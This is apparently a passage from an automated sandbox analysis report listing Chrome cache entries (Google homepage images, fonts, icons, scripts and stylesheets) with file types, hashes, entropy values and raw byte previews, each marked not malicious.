Preview:	)]}'.22;["8YP1Zq3GL5iK9u8P68momQ0","2085"]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;

Chrome Cache Entry: 189

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 540 x 960, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	2464
Entropy (8bit):	6.728859049021782
Encrypted:	false
SSDEEP:	48:1tTBspAyHqWIkKRMeqn4+KB5WV3lHTTZaztkEj7yLnQn:PTBsiLWsM/n43B5+3FfZI7n
MD5:	9D12364BD24C8C61C5FDE3FD2961F799
SHA1:	1925E53902CC1D4EA12BDAF20921A656C187C682
SHA-256:	3C5EDF24D763B298BAD77A3662AB811F1B6C030A5090859139ACD7A8FE7E7885
SHA-512:	004F2C0CBBF602E6F114CCEC43D6CC9DDB978C88A363C1F52F1CEF353E6C399E48BB8F89203EF57200C86A4751206318EEF2F05C7FEF16B83DCCC613C9457B86
Malicious:	false
Reputation:	low
URL:	https://www.google.com/logos/2024/popcorn/rc4/google_frame_mask.png
Preview:	.PNG........IHDR.............I.P....EPLTEGpL.&..&..&..&..&..&..&..&..&..&..&..&..&..&..&..&..&..&..&..&..&..&........tRNS..@..p0..` P...........H.{.....IDATx......@........nl.....r?..H@:.fE.e0......E...J32..$..85.. SuM.@]=.F..n.l#.6..0!3..S?.r..}n.......A`.A).....xa{.{..l...4..\|S..ZJ.....1v1...MMl...r.+8.d......2..c.]..d...\...Qs...7..a...8.&...!wx&eN<ul;$....G...\|J6..ctN.Q.-}...M`.!.[..Z..9.8.!.q.C...@....8.a..q.ro.)...>$.9......."...._H......7.....x.+..ve.6...7].Tr.TJ...3....;+..7.+eZ.d~.......T.8.G...b_[.#.....n.....SOqE?...qa.....Oa.p.6P.)W.S.v.../......\|.5:l..9..Ss..N.F...N..&..9.S=r.+......q ..8...@...q ......@...q ..6_!.8...@..C~0.s ..8...@..s`B..@...q ..80!E...........q ..8......1>G...q ..8.NM...8...@...q ..8 ......q ..8...@....8...@...q ..8@..5.p.9.@...q ..8........'\..8x.q@.....90!E.......9.R.C0.....@...q ....@...8...]Y.!.I0.8...@...q ....@.<^.....@......N.AL..xi..@...q ..8....q ..8...@...q ..9....q ..8.....q ....@...q ..8....q.zk..A

Chrome Cache Entry: 190

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 540x960, components 3
Category:	dropped
Size (bytes):	44346
Entropy (8bit):	7.9701724338685205
Encrypted:	false
SSDEEP:	768:FKLIJR8S2/QSoM+eI34Hs4trizZOJJRdwv0P9Bpc0NaqX8JSAwgF2i3:F0ID2KeS4M4trizZOJjXP9BzbMJtwgl3
MD5:	EC0FEF9CA01D35AEC2ABDA470EE95621
SHA1:	DB8FD1F11792905E91F20286E877599C2A8AF99B
SHA-256:	0A66152E483791358EB442C016AA188B53D3CC855959BA840A2257A6E0DF24BE
SHA-512:	511D77A2E59E584A9478FF360C82229EAC08951B3FEDC9FFDEA8AADD5FBB11A7C707F9626B3619D70C2840FCF7E4BE2EA40AB7FBCF4E819F8EB9104BE2EFF877
Malicious:	false
Reputation:	low
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................A......................!."1A..2QBaq......R...#$%4br35...CS.c.Ds...............................(......................213Aq..!#B"..Qa.............?....%N2....4P.E.RK.M....$.%.._Q`..1.q...1....YyT.I.y72d..)......LBzu....$......xO.&P...+.'mv[.O.3.XH:...g.qK..T....Ql..a....P.K.T...s.w/i.<..eh........3...._.....CR..G..G.....L..).e,...o..p.3.....w.s....l5..]...y.....L..ERt. ....\|..e.1.kH 6.ez.5F..\..X..U...{)...sn....SHs.$[.T.C].@...ZP..$c0. .e....M./..6.:..}V.......b.g.sI..'B..i.,7u.:&.....>...\|.)..C[;....y...7..J.7.Ys...#v.TMN$......8....7..H3M.W.-wJ..:......'.v.z.S..e.....u...dT..Q.(..g.\|..C.O..a.o.C.C..$.......F...wp..!x<....v......G.....&O.WwI3....O4....0.a...5e..t...d...c..M...@...N.......K..U...>$w..Eo]V..9kXae..$S%.x.&..gk.....E..Ssz.

Chrome Cache Entry: 191

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	12020
Entropy (8bit):	1.3974313983663706
Encrypted:	false
SSDEEP:	48:Yeb7c/dMQpRHqwhPIxt9OqNa2JV9iAoul66BDu5JUroEPXPa5q3Ld7vlAvhWxh:iD8+YDxh
MD5:	47903186BD600D99B9F1504193BBBC0E
SHA1:	7BBCB0BCF5DFF9CEA8503F84EA5BE4A0736ED365
SHA-256:	78CB7394E326BAEDB6BEA727710B4A12369CDE77C3636448FE5E01C34A94ED8C
SHA-512:	E384C202D543668B17911B47C3C25D60424E4EF4DA8821624EA4DF25FFBD79C861C4D988182E09FAEB1B3FE3405BA7988D8A6ACF15B8B045A4B1F7A1023C6166
Malicious:	false
Reputation:	low
URL:	https://www.google.com/xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA
Preview:	{"chunkTypes":"1000011111110011110001000010110100000011111111111111111111111111111110110111111111110101111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101110111111113101101111111111110111111111111110111111111111111100011011111111111111111111111110101002222222212212212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212122212121212121212122212222221221221211122121212121212121212121212121212122212121212121212121212121212121212121212222122122122212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212121212122212222222222212122121121221212121212121221212122121212212112121212121212122222222121112112222112121212122121212121212122121222222212212212212212112121221212

Chrome Cache Entry: 192

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (736)
Category:	dropped
Size (bytes):	3516
Entropy (8bit):	5.548775726691877
Encrypted:	false
SSDEEP:	48:ZfSAWM+fMBryd293y+qrocut9Q4msFNC02W5RfNXqzyvBMB6HsByJx8qVKuShZz2:81KrW63y+OocQ9t9bv1qzyVxrSxax
MD5:	7437D4F7DC4BAF6E88AB554CDA0B28F4
SHA1:	E36353C07E1E38FD6DBAEEE10FD790B580A7FD23
SHA-256:	6F2317A8A8668F3043C0A8B24292A3130BAF965BEBB0E8914A4EEA3D16586C95
SHA-512:	6C11487D4AD06F67C0E526525FE13CAFDFCAEC62CFC9A944075733119DCC70B2075C6AA933E84A4F6A8A8A3375EDDA1A4FD855E5B219BC5E87BD9331D68EF53E
Malicious:	false
Reputation:	low
Preview:	"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{._.q("Wt6vjf");.var Lz=function(a){this.ta=_.y(a,0,Lz.mb)};_.G(Lz,_.C);Lz.prototype.Xa=function(){return _.ll(this,1)};Lz.prototype.oc=function(a){_.xl(this,1,a)};Lz.mb="f.bo";var Mz=function(){_.Go.call(this)};_.G(Mz,_.Go);Mz.prototype.ab=function(){this.ar=!1;Nz(this);_.Go.prototype.ab.call(this)};Mz.prototype.j=function(){Oz(this);if(this.lk)return Pz(this),!1;if(!this.ks)return Qz(this),!0;this.dispatchEvent("p");if(!this.qp)return Qz(this),!0;this.bo?(this.dispatchEvent("r"),Qz(this)):Pz(this);return!1};.var Rz=function(a){var b=new _.su(a.yx);a.cq!=null&&b.l.set("authuser",a.cq);return b},Pz=function(a){a.lk=!0;var b=Rz(a),c="rt=r&f_uid="+_.Ll(a.qp);_.kq(b,(0,_.E)(a.l,a),"POST",c)};.Mz.prototype.l=function(a){a=a.target;Oz(this);if(_.rq(a)){this.hn=0;if(this.bo)this.lk=!1,this.dispatchEvent("r");else if(this.ks)this.dispatchEvent("s");else{try{var b=_.uq(a),c=JSON.pars

Chrome Cache Entry: 193

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (621)
Category:	dropped
Size (bytes):	1037389
Entropy (8bit):	5.720009321594479
Encrypted:	false
SSDEEP:	12288:28Qo92wOfIoB6u2FfvsSkatSeOT2VU/T5wkjbRMo/:LiwOfIoIu2ZvsSkuSeOT2VU/T5wqdn
MD5:	8380E1B09DA81DF5EE15A8AC24242F97
SHA1:	58A4DF1AF299649478B500E9D448D61F2F7827A2
SHA-256:	9BA23DFE47510269CFFB748640336C7CC9F7AEC818D4560F852C085930A928EB
SHA-512:	7E9058ADF28EF8319CF6DC63AF3921943CF54890488B382337DB92F6CD4B9D79DD5597FFF0B2AB432E87B325D8AE7FD24351824FFFD1BD3DE7AD1C86792706CD
Malicious:	false
Reputation:	low
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT././. SPDX-License-Identifier: Apache-2.0././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var baa,caa,naa,Aaa,Caa,Iaa,Taa,$aa,iba,kba,mba,nba,rba,sba,xba,Cba,Fba,Hba,Iba,Lba,Kba,Eba,Ta,Oba,Sba,Tba,Uba,Yba,aca,bca,dca,eca,fca,hca,ica,jca,kca,oca,qca,sca,Eca,Fca,Gca,Aca,Hca,Bca,Ica,zca,Jca,yca,Kca,Mca,Tca,Vca,Wca,$ca,ada,eda,hda,bda,gda,fda,dda,cda,ida,jda,nda,pda,oda,sda,tda,uda,wda,yda,xda,Ada,Bda,Cda,Eda,Fda,Gda,Hda,Ida,Lda,Mda,Nda,Rda,Qda,Uda,Vda,$da,aea,bea,dea,cea,fea,eea,iea,hea,kea,mea,pea,qea,tea,uea,yea,zea,Eea,Gea,Nea,Oea,Qea,xea,Bea,Uea,Yea,efa,ifa,jfa,rfa,ofa,sfa,ufa,yfa,zfa,.Afa,Cfa,Dfa,lfa,Ffa,Hfa,Lfa,Nfa,Ufa,Zfa,aga,kga,mga,oga,pga,yga,Aga,Dga,Fga,Gga,Iga,Kga,Oga,Pga,Rg

Chrome Cache Entry: 194

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	5430
Entropy (8bit):	3.6534652184263736
Encrypted:	false
SSDEEP:	48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
MD5:	F3418A443E7D841097C714D69EC4BCB8
SHA1:	49263695F6B0CDD72F45CF1B775E660FDC36C606
SHA-256:	6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
SHA-512:	82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
Malicious:	false
Reputation:	low
URL:	https://www.google.com/favicon.ico
Preview:	............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................

Chrome Cache Entry: 195

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 15996, version 1.0
Category:	downloaded
Size (bytes):	15996
Entropy (8bit):	7.989012096227512
Encrypted:	false
SSDEEP:	384:nH4UArsQ/nHYjtuHgovTC+H+b23+kMw/KjK0TQ59u98pgQXk:nYZQjtuHgYGbrMyjDiJXk
MD5:	CC536892EABDE0EAEB81493BDA8E189A
SHA1:	15C0180AD7BDF9D0F963747447BC9446FC42D2DC
SHA-256:	97399A2914C593DA2895D9729AA0170A1956E91EE54CF7550696691949558A37
SHA-512:	94F605C4C4FE76EBDB2D5428C6BA69F83B75C65B6932251C0C3E90F92CC1F421FD9F15E81D5985693DC564B8644D90A26DA3E9C63976CF5862ED54D5ED0C4320
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2
Preview:	wOF2......>\|..........>...........................<..:..:.`..:.....p..~.....6.$..(. ..>..N.....5xn.u..b.....c..<..Rw.H..q.(.....9A...^.=h.%J...4.\.\.[....[....h.j..AP.....a..]N.o....6.a..uO..R.\|o...wO..t....s....^F...Oy....IN^..X...9sg...(;..L.....5.s~...?....%.0.f....b.. ..;.. "k+.v`.....1kq.\mqLp.]\|..Z\..O......=.......h..,u.................y.h.o.Z..%.....g#..B......V...3.r....J..>g.-rU?+.3A.....C...... .21..f...Z.......P..o..g\.b... v...6..0...b.....?..-WL...Z2...1..Q./....... ..C..G.^r....O......io;.o..4.<....7.Pm..!.Nu.=..Oc............e.w.g.....,...c...0V.P...R.){..u...>.fi..S.w.G...-..... $.8......w..hp...T@..Go....).......;.....B.)..p.\.?.-KC.S.5..pX9...'.!.-....R.Sg.>x.o.yP......S....a...m<.+".t%..3x.?3M;....k.....I&I.3g.26...p...}~....X.x..G.<)..k..U....AZ..A@....Cu..Tv{...\|v.04H.$Xc..E.)<...!........^..~.7P.u...xH..rX..8O....y.k(...0.p 0.%.U...Z...%...\|LlUJ.]L_...9..AX.$E.$.sa.(v8L!...rc.-....I..W..........^U...@.....3P............M..

Chrome Cache Entry: 196

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (768)
Category:	downloaded
Size (bytes):	1425
Entropy (8bit):	5.369730450294109
Encrypted:	false
SSDEEP:	24:kWfSIi01lHbcYmfNUgG/Rt3Fhe9kuKfKXvWWVqpOUcJIUGbpxGbJ8OOHQLz9Trky:ZfSN0/4gfhQofaWHxcGUGbpxGbO8ZTrx
MD5:	33CEBB03C13AE52E6A8B3EBEE28706BF
SHA1:	58C87F2AD7CFF41F1A2003B7A4F36882A16E6965
SHA-256:	2C8F42EDFAD6B9734A8E4CDFE96BFB321120BF75B15CAC9EE2EBDD37D593CA4B
SHA-512:	9C55135B514001C7A567AD5FA9DB0E63FA8FB24DA0C665DDFDC8D7AB513AA7B30980A27E684AA334E9588084FAD91E73919F51BA73A04A7D84C38283098B1315
Malicious:	false
Reputation:	low
URL:	"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.es5.O/ck=boq-one-google.OneGoogleWidgetUi.hnwCoQrxzwQ.L.B1.O/am=IEAwYGw/d=1/exm=A1yn5d,A7fCU,BVgquf,EEDORb,EFQ78c,GkRiKb,IZT63,JNoxi,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RMhBfe,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,e5qFLc,ebZ3mb,fKUV3e,gychg,hKSk3e,hc6Ubd,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,ovKuLd,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,yDVVkb,yYB61,zbML3c,zr1jrb/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHtG5mpbAvjw6lx2uzOrYGtSsP2slQ/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=P6sQOc"
Preview:	"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{._.q("P6sQOc");.var xpa=!!(_.ni[0]>>26&1);var ypa=function(a,b,c,d,e){this.o=a;this.N=b;this.v=c;this.O=d;this.ha=e;this.j=0;this.l=OY(this)},zpa=function(a){var b={};_.Ea(a.Nq(),function(e){b[e]=!0});var c=a.Fq(),d=a.Hq();return new ypa(a.Gq(),c.j()1E3,a.Aq(),d.j()1E3,b)},OY=function(a){return Math.random()Math.min(a.NMath.pow(a.v,a.j),a.O)},PY=function(a,b){return a.j>=a.o?!1:b!=null?!!a.ha[b]:!0};var QY=function(a){_.S.call(this,a.oa);this.l=a.service.bs;this.o=a.service.metadata;a=a.service.hE;this.fetch=a.fetch.bind(a)};_.G(QY,_.S);QY.W=function(){return{service:{bs:_.MY,metadata:_.IY,hE:_.GW}}};QY.prototype.j=function(a,b){if(this.o.getType(a.wb())!==1)return _.hp(a);var c=this.l.Ir;(c=c?zpa(c):null)&&PY(c)?(b=RY(this,a,b,c),a=new _.gp(a,b,2)):a=_.hp(a);return a};.var RY=function(a,b,c,d){return c.then(function(e){return e},function(e){if(xpa)if(e instanceof _.Bf){

Chrome Cache Entry: 197

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
Category:	downloaded
Size (bytes):	52280
Entropy (8bit):	7.995413196679271
Encrypted:	true
SSDEEP:	1536:1rvqtK8DZilXxwJ8mMwAZy7phqsFLdG3B4d:xytBZits8bw4wzbFxG3B4d
MD5:	F61F0D4D0F968D5BBA39A84C76277E1A
SHA1:	AA3693EA140ECA418B4B2A30F6A68F6F43B4BEB2
SHA-256:	57147F08949ABABE7DEEF611435AE418475A693E3823769A25C2A39B6EAD9CCC
SHA-512:	6C3BD90F709BCF9151C9ED9FFEA55C4F6883E7FDA2A4E26BF018C83FE1CFBE4F4AA0DB080D6D024070D53B2257472C399C8AC44EEFD38B9445640EFA85D5C487
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2
Preview:	wOF2.......8.....................................^...$..4?HVAR..?MVAR9.`?STAT.',..J/.......`..(..Z.0..R.6.$.... .....K..[..q..c..T.....>.P.j.`.w..#...%......N.".....$..3.0.6......... .L.rX/r[j.y.\|(.4.%#.....2.v.m..-..%.....;-.Y.{..&..O=#l@...k..7g..ZI...#.Z./+T..r7...M..3).Z%.x....s..sL..[A!.51w'/.8V..2Z..%.X.h.o.).]..9..Q`.$.....7..kZ.~O........d..g.n.d.Rw+&....Cz..uy#..fz,(.J....v.%..`..9.....h...?O..:...c%.....6s....xl..#...5..._......1.>.)"U.4 W....?%......6//!$...!.n9C@n...........!""^.....W..Z<.7.x.."UT.T....E.."R>.R..t.....H d..e_.K../.+8.Q.P.ZQ....;...U....]......._.e......71.?.7.ORv.?...l...G\|.P...\|:...I.X..2.,.L........d.g.]}W#uW]QnuP-s.;.-Y.....].......C..j_.M0...y.......J..........NY..@A...,....-.F......'..w./j5g.vUS...U..0.&...y7.LP.....%.....Y......Y..D. e.A..G.?.$.......6...eaK.n5.m...N...,...+BCl..L> .E9~.b[.w.x....6<...}.e...%V....O.......*.?...a..#[eE.4..p..$...].....%......o._......N.._~..El....b..A.0.r8.....\|..D.d..

Chrome Cache Entry: 198

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	7.8938748179764
Encrypted:	false
SSDEEP:	48:aGmurFSJs329qIqvZO7N4+lRSm+3gdfI8hV92jPH9b45MloqbSHTrpG:4QUvKI7943UJhn2jP3pUG
MD5:	6282A05D151E7D0446C655D1892475E2
SHA1:	B2B05F319DA0E73250200AE9BB518A318D6B4C5D
SHA-256:	4CAB9CF78FD7C85AE2236CDD47B905FA4173F664946DFAB008591B3CFE4280B7
SHA-512:	DF0C4C01555430BD2AFAD409E40A422F5EFB0ED9B6E86168874B46312FFC0BA7CA2B5503E49858035056C342A83CBC42721AA89077BD2E1F698692AF4277BAB5
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...0...0.....W.......IDATx........m.tm.86.m.m...m.Xo..._~..Mm.&..x....v.....?... .~^.TV....z.wK.....-.`..w.............4....."...z6Z."....`;@....!...S.Q..E...L$..`01..S(.v...vn._...H.......H.fs.8).....q....\....9B>...)>#2...A....z..8.#+A.V-..hh....3.......c.......F. 3.......~.^Q......c.....a.1...gZ....y....wU..2...].-.0b].......[......w...&K..$..K..\.t..QoY..O?....u.Sa.-...na.Z..}..._s..~[.Ue.M.!#Y.....%.t.7y....J......Q.0fC.Fo..@..&...B.....&..}.ld....O.#+...<.z..,."?vC....Y.....<d..."b.D.(sX..c..5.z,..!...oV.. .....>O.#..pHG..y.j.7.-@.K.s..,...&.%6.. O=dj....S..;.O..ylc.O.~....Tn.F.\|.Y..X..@........e..O.Z......}(H...vp.... ...y..&..:.......8y...{n..R^...:.q.......>....C.....^P..C..%..<. 6...9..,.$0x.M.=.`\..MI..\|.........^...W-"...@..J........K.m...h...x.H.>.c.>.w!......:X.b%.v....)..[R..-..>.+!..?...?.....Q.G:F...k..A.)`*.^N$...{9.<.PD...7`).3.d........h.k..{]&.;^.h.s>BREP.X.O.~P\|[....R].m,.......Z..Pk.g0.yl...Z.qp..

Chrome Cache Entry: 199

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1689), with no line terminators
Category:	downloaded
Size (bytes):	1689
Entropy (8bit):	5.640520027557763
Encrypted:	false
SSDEEP:	48:ifKf9wIe7P3SJgX4DW45JUzBG/t5JUTLF5Jv325Jvhv:5De7Pn4DW+Go3GnXdcHv
MD5:	45DD7BD58C9F085DA52FA16A2A150066
SHA1:	9B5CF4B288EDE14AE8834F3EF2A58145B8EC8CBC
SHA-256:	0D5C53FCC37C7A2CE26367BBE6197FCD9272DD7EBC81823D088A4DFFF5AE599B
SHA-512:	520B8DF68524C2CEF393B837D7EAD0168028C94697E1DA0AC4BDDAFAB849D1B26D7E7933082146AE6A220A449F066CBBBA2EBFC6CC30D3F756FBD98EE061C8DF
Malicious:	false
Reputation:	low
URL:	"https://www.google.com/xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4"
Preview:	.MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:var(--Nsm0ce);--izGsqb:var(--Nsm0ce);--todMNcl:var(--EpFNW);--p9J9c:var(--Nsm0ce)}:root{--KIZPne:#a3c9ff;--xPpiM:#001d35;--Ehh4mf:var(--Nsm0ce)}:root{--Yi4Nb:#d2d2d2;--pEa0Bc:#474747;--kloG3:#d2d2d2;--YaIeMb:#f7f8f9;--Pa8Wlb:#0b57d0;--izGsqb:#0b57d0;--todMNcl:#fff;--p9J9c:#0b57d0}.EpPYLd{display:block;position:relative}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default}.LGiluc,.EpPYLd[disabled]{pointer-events:none;cursor:default}@media (forced-colors:active){.EpPYLd[disabled]{color:GrayText}}.LGiluc{border-top:1px solid;height:0;

Chrome Cache Entry: 200

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (13378)
Category:	downloaded
Size (bytes):	203802
Entropy (8bit):	5.877982490687187
Encrypted:	false
SSDEEP:	3072:+IFeKFbSdjX+FZuabIEvH53rrvIc3AUtN+ek/jFCg:+IFeKFedaFZ5IEf53rLIc4Mg
MD5:	9ABF07332A6E5E89C4CD5634AD5D8F74
SHA1:	BAB5F45BE398B4778438DD6E522883DC9FBAC4A3
SHA-256:	E87D90AB5BF4B37C375911498F86C7ABF1338A4671EBF4473A2F20D3F2E9091D
SHA-512:	2B35A7E24EAF9495DC30A7711761D6D251113DD7D46168942D460B1378D90EA4A1E66A43FD7BC649C36B99B1CDE4E84182803EBA15ABCB9C7954AC21BED46562
Malicious:	false
Reputation:	low
URL:	https://www.google.com/
Preview:	<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="dVFPWq-nlQ1-HVWUPIK3lQ">window._hst=Date.now();performance&&performance.mark&&performance.mark("SearchHeadStart");</script><script nonce="dVFPWq-nlQ1-HVWUPIK3lQ">(function(){var _g={kEI:'64P1ZseiHfKwi-gPg-6IsAw',kEXPI:'31',kBL:'Q-9k',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){.var h=this\|\|self;function l(){return window.google!==void 0&&window.google.kOPI!==void 0&&window.google.kOPI!==0?window.google.kOPI:null};var m,n=[];function p(a){for(var b;a&&(!a.getAttribute\|\|!(b=a.getAttribute("eid")));)a=a.parentNode;return b\|\|m}function q(a){for(var b=null;a&&(!a.getAttribute\|\|!

Chrome Cache Entry: 201

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	5430
Entropy (8bit):	3.6534652184263736
Encrypted:	false
SSDEEP:	48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
MD5:	F3418A443E7D841097C714D69EC4BCB8
SHA1:	49263695F6B0CDD72F45CF1B775E660FDC36C606
SHA-256:	6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
SHA-512:	82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
Malicious:	false
Reputation:	low
Preview:	............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................

Chrome Cache Entry: 202

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4998)
Category:	dropped
Size (bytes):	5003
Entropy (8bit):	6.103551681259432
